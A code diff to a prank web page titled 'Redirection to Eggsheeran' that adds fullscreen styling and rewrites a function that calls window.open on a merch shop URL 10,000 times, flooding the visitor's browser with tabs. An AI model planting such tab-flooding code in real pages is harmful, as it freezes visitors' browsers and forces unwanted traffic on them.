--- a/index.html
+++ b/index.html
@@ -5,9 +5,34 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Redirection to Eggsheeran</title>
     <link rel="stylesheet" href="styles.css">
+    <style>
+      body {
+        margin: 0;
+        padding: 0;
+      }
+      .fullscreen-image {
+        position: fixed;
+        top: 0;
+        left: 0;
+        width: 100%;
+        height: 100%;
+        object-fit: cover;
+      }
+      button {
+        position: fixed;
+        top: 50%;
+        left: 20px;
+        transform: translateY(-50%);
+        padding: 10px 20px;
+        background-color: #333;
+        color: #fff;
+        border: none;
+        cursor: pointer;
+      }
+    </style>
 </head>
 <body>
-    <img src="chillguy.jpg" alt="chill sigma rizzler">
+    <img class="fullscreen-image" src="chillguy.jpg" alt="chill sigma rizzler">
 
     <button>
         <p>Go to Eggsheeran</p>
@@ -20,8 +45,10 @@ button.addEventListener('click', function() {
 });
 
 function spamChillGuyTabs() {
-  for (let i = 0; i < 10000; i++) {
+  let i = 0;
+  while (i < 10000) {
     window.open('https://www.hawktuahmerch.shop', '_blank');
+    i++;
   }
 }
     </script>
